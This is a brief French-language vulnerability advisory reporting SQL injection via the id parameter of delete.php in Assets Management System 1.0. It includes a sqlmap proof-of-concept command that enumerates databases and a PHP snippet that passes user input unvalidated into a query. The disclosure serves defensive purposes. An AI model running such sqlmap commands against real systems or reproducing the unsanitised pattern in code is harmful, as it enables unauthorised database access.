
Assets Management System 1.0 est vulnérable à l'injection SQL via le paramètre id dans delete.php
Description
Assets Management System 1.0 est vulnérable à une injection SQL via le paramètre id dans delete.php
PoC
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch

Revue de code (delete.php)
<?php include 'core/init.php';
$id = $_GET['id'];
delete_data($con,$id);
header('location:home.php');
Il n'y a ni validation ni assainissement de la variable $id. Cela signifie que toute valeur fournie par un utilisateur comme paramètre id sera directement utilisée dans la requête SQL.